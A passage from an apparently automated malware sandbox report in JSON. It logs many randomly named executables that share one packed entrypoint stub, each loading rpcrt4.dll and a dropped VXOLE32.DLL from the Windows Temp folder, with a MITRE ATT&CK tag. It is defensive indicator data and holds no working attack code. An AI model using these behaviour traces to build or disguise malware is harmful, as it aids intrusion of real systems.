\"dnxpf.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"drbdjh.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"lhrhrpt.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"rtrnhfh.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"vhftp.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"lxhhl.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"fnrxft.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"dpndv.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"rxfxxnn.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"xprhl.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"npjbvrb.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"220404.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76DD0000\n \"0004664.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76DD0000\n \"4060800.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76DD0000\n \"482642.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76DD0000\n \"lthxxd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76DD0000\n \"bbpbfhd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76DD0000\n \"ntpbdh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76DD0000\n \"rrjxnjh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76DD0000\n \"004422.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76DD0000\n \"rlrbxrl.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76DD0000\n \"pnrdltb.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76DD0000\n \"hvjhb.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76DD0000\n \"xnpjdph.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76DD0000\n \"024648.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76DD0000\n \"640660.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76DD0000\n \"22404.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76DD0000\n \"4862082.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76DD0000\n \"fnvpbxr.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76DD0000\n \"njdbdxd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76DD0000\n \"brrppv.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76DD0000\n \"20640.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76DD0000\n \"22260.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76DD0000\n \"408224.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76DD0000\n \"26064.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76DD0000\n \"2848464.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76DD0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"0004664.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"0004664.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"0004664.exe\" loaded module \"KERNEL32\" at base 77490000\n \"0004664.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"0004664.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cbb0000\n \"4060800.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"4060800.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"4060800.exe\" loaded module \"KERNEL32\" at base 77490000\n \"4060800.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"4060800.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cbb0000\n \"4060800.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 750d0000\n \"lthxxd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"lthxxd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"lthxxd.exe\" loaded module \"KERNEL32\" at base 77490000\n \"lthxxd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"lthxxd.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cbb0000\n \"rrjxnjh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"rrjxnjh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rrjxnjh.exe\" loaded module \"KERNEL32\" at base 77490000\n \"rrjxnjh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rrjxnjh.exe\" loaded module \"MSVCRT.DLL\" at base 76d20000\n \"rrjxnjh.exe\" loaded module \"SHLWAPI.DLL\" at base 77080000\n \"rrjxnjh.exe\" loaded module \"USER32.DLL\" at base 76af0000\n \"rrjxnjh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 750d0000\n \"004422.exe\" loaded module \"MSVCRT.DLL\" at base 76d20000\n \"004422.exe\" loaded module \"SHLWAPI.DLL\" at base 77080000\n \"004422.exe\" loaded module \"USER32.DLL\" at base 76af0000\n \"004422.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 750d0000\n \"pnrdltb.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"pnrdltb.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"pnrdltb.exe\" loaded module \"KERNEL32\" at base 77490000\n \"pnrdltb.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"pnrdltb.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cbb0000\n \"xnpjdph.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"xnpjdph.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"xnpjdph.exe\" loaded module \"KERNEL32\" at base 77490000\n \"xnpjdph.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"xnpjdph.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cbb0000\n \"xnpjdph.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 750d0000\n \"024648.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"024648.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"024648.exe\" loaded module \"KERNEL32\" at base 77490000\n \"024648.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"640660.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"640660.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"640660.exe\" loaded module \"KERNEL32\" at base 77490000\n \"640660.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"640660.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cbb0000\n \"640660.exe\" loaded module \"MSVCRT.DLL\" at base 76d20000\n \"640660.exe\" loaded module \"SHLWAPI.DLL\" at base 77080000\n \"640660.exe\" loaded module \"USER32.DLL\" at base 76af0000\n \"640660.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 750d0000\n \"22404.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"22404.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"22404.exe\" loaded module \"KERNEL32\" at base 77490000\n \"22404.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"22404.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cbb0000\n \"4862082.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"4862082.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"4862082.exe\" loaded module \"KERNEL32\" at base 77490000\n \"4862082.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"4862082.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cbb0000\n \"fnvpbxr.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"fnvpbxr.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"fnvpbxr.exe\" loaded module \"KERNEL32\" at base 77490000\n \"fnvpbxr.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"fnvpbxr.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cbb0000\n \"njdbdxd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"njdbdxd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"njdbdxd.exe\" loaded module \"KERNEL32\" at base 77490000\n \"njdbdxd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"njdbdxd.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cbb0000\n \"brrppv.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"brrppv.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"brrppv.exe\" loaded module \"KERNEL32\" at base 77490000\n \"brrppv.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"22260.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"22260.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"22260.exe\" loaded module \"KERNEL32\" at base 77490000\n \"22260.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"22260.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cbb0000\n \"26064.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"26064.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"26064.exe\" loaded module \"KERNEL32\" at base 77490000\n \"26064.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"2848464.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"2848464.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"2848464.exe\" loaded module \"KERNEL32\" at base 77490000\n \"2848464.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"2848464.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cbb0000\n \"vdxvjb.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"vdxvjb.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"vdxvjb.exe\" loaded module \"KERNEL32\" at base 77490000\n \"vdxvjb.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"vdxvjb.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cbb0000\n \"664004.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"664004.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"664004.exe\" loaded module \"KERNEL32\" at base 77490000\n \"664004.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"664004.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cbb0000\n \"482028.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"482028.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"482028.exe\" loaded module \"KERNEL32\" at base 77490000\n \"482028.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"482028.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cbb0000\n \"6466842.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"6466842.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"6466842.exe\" loaded module \"KERNEL32\" at base 77490000\n \"6466842.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"6466842.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cbb0000\n \"82080.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"82080.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"82080.exe\" loaded module \"KERNEL32\" at base 77490000\n \"82080.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"82080.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 750d0000\n \"02848.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"02848.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"02848.exe\" loaded module \"KERNEL32\" at base 77490000\n \"02848.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"02848.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cbb0000\n \"202808.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"202808.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"202808.exe\" loaded module \"KERNEL32\" at base 77490000\n \"202808.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"202808.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cbb0000\n \"fjhdxhf.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"fjhdxhf.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"fjhdxhf.exe\" loaded module \"KERNEL32\" at base 77490000\n \"fjhdxhf.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"fjhdxhf.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cbb0000\n \"vnhnhxx.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 750d0000\n \"fhjttl.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"fhjttl.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"fhjttl.exe\" loaded module \"KERNEL32\" at base 77490000\n \"fhjttl.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"fhjttl.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cbb0000\n \"22624.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"22624.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"22624.exe\" loaded module \"KERNEL32\" at base 77490000\n \"22624.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"22624.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cbb0000\n \"482820.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"482820.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"482820.exe\" loaded module \"KERNEL32\" at base 77490000\n \"482820.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"vbtfdd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"vbtfdd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"vbtfdd.exe\" loaded module \"KERNEL32\" at base 77490000\n \"vbtfdd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"vbtfdd.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cbb0000\n \"vbtfdd.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 750d0000\n \"nlrvnpx.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"nlrvnpx.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"nlrvnpx.exe\" loaded module \"KERNEL32\" at base 77490000\n \"nlrvnpx.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"xvprxbd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"xvprxbd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"xvprxbd.exe\" loaded module \"KERNEL32\" at base 77490000\n \"xvprxbd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"xvprxbd.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cbb0000\n \"vdphh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"vdphh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"vdphh.exe\" loaded module \"KERNEL32\" at base 77490000\n \"vdphh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"0484008.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"0484008.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"0484008.exe\" loaded module \"KERNEL32\" at base 77490000\n \"0484008.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"0484008.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cbb0000\n \"88060.exe\" loaded module \"MSVCRT.DLL\" at base 76d20000\n \"88060.exe\" loaded module \"SHLWAPI.DLL\" at base 77080000\n \"88060.exe\" loaded module \"USER32.DLL\" at base 76af0000\n \"88060.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 750d0000\n \"8084222.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"8084222.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"8084222.exe\" loaded module \"KERNEL32\" at base 77490000\n \"8084222.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"8084222.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cbb0000\n \"4220002.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 750d0000\n \"xprhl.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"xprhl.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"xprhl.exe\" loaded module \"KERNEL32\" at base 77490000\n \"xprhl.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rxfxxnn.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 706d0000\n \"rxfxxnn.exe\" loaded module 